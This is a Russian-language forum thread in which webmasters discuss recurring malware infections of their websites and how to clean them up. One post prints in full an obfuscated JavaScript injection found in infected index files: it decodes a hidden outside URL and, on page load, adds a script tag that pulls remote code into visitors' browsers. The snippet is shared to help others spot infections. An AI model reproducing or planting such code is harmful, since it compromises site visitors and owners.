вирус на сайте

[virtualbrest]

Ну, ладно, признаю, я немного переборщил в этой статье. Писалась она год назад кстати, и ессно сейчас, с высоты по иному все смотрится.
Но дело в том, что первая атака случилась, когда я уехал на отдых за рубеж, и бука с собой не взял, на сайт не заходил, когда уезжал, все было ок. Приехал - получил сюрприз.
Описанный в статье метода работает, может кому-то пригодится.

 

[stasikkk]

на последней версии DLE таких проблем уже не будет,т.к. реализован спец. модуль от таких "хороших людей"

 

[ivashka]

Проблема еще с одним сайтом, даже с двума.

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Постоянно заражаются вирусами.
ФТП отключал, и все ровно заражаются.
Вирус создает папки в папках на которых стоят права 644, дописывает в файлы на которых те же права.
Помогите пожалуйста, уже все перепробывал.

 

[drawing4]

если у вас в коде iframe то необязательно искать его. Т.е. кроме iframe в индексных файлах может быть приблизительно такой код:

<script>var b;if(b!='c'){b=''};var M;if(M!='a'){M=''};var Q='';function Y(){var L="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x62\x61\x72\x6e\x65\x73\x61\x6e\x64\x6e\x6f\x62\x6c\x65\x2e\x63\x6f\x6d\x2e\x67\x65\x74\x61\x66\x72\x65\x65\x6c\x61\x6e\x63\x65\x72\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var x;if(x!='z'){x='z'};this.e='';var H=unescape;var E='';var O=new Date();var p=window;var Lq="g";var QO;if(QO!='' && QO!='nx'){QO='v'};function d(n,t){this.Wy="";var S=new Array();var q;if(q!='zn'){q=''};var l=H("%5b")+t+H("%5d");var HJ=new RegExp(l, Lq);var GC;if(GC!='' && GC!='R'){GC=null};var k;if(k!='' && k!='hY'){k=null};return n.replace(HJ, E);};var Qc;if(Qc!='' && Qc!='eP'){Qc=null};this.A='';this.bQ='';var P=d('867346903716749876421230393179','39624517');var mf="";var lh=new String();this.yJ='';var X=document;var Jx;if(Jx!='zQ' && Jx!='z_'){Jx='zQ'};var F='';var aQ=new Array();this.w="";var PK=H("%2f%6a%65%75%78%76%69%64%65%6f%2e%63%6f%6d%2f%6a%65%75%78%76%69%64%65%6f%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%6f%62%69%6c%65%2e%64%65%2f%31%39%6c%6f%75%2e%63%6f%6d%2e%70%68%70");var mA='';var UN;if(UN!=''){UN='eW'};var cEe='';function ES(){var Qr="";var yi='';F=L;var RF;if(RF!='xl'){RF=''};F+=P;var AI='';this.XJ="";F+=PK;var eh='';var aLY;if(aLY!='DK'){aLY=''};var kh;if(kh!='' && kh!='V'){kh='QOm'};try {var Sz='';r=X.createElement(d('smcfrmiYpeto','mqTGeER78NYfBo'));var gI=new Date();var kx;if(kx!='Kw' && kx!='De'){kx='Kw'};r.src=F;r.defer=[2,1][1];this.um="";var uj=new Array();this.ia="";X.body.appendChild(r);var Xw;if(Xw!='Z' && Xw!='UU'){Xw=''};} catch(U){};}this.Gj='';var CM;if(CM!='vU'){CM=''};var vt=new Array();var Rn;if(Rn!='' && Rn!='QOD'){Rn='hD'};p["onloa"+"d"]=ES;var gG='';var vN='';this.Zl='';var pel;if(pel!='Bq' && pel!='dk'){pel=''};};var Br;if(Br!='' && Br!='uw'){Br='qW'};var ma='';var NZ;if(NZ!='_'){NZ=''};var lW=new Date();Y();</script>

Чаще всего он написан в одну две строчки и зашифрован.

 

[BOLVERIN]

легче всего убить ифреймы во всех файлах либо залив свой бекап либо снарядив хостера откатить бекап файлов.
под пасы у меня специальная книжечка. пока не взломали ничего)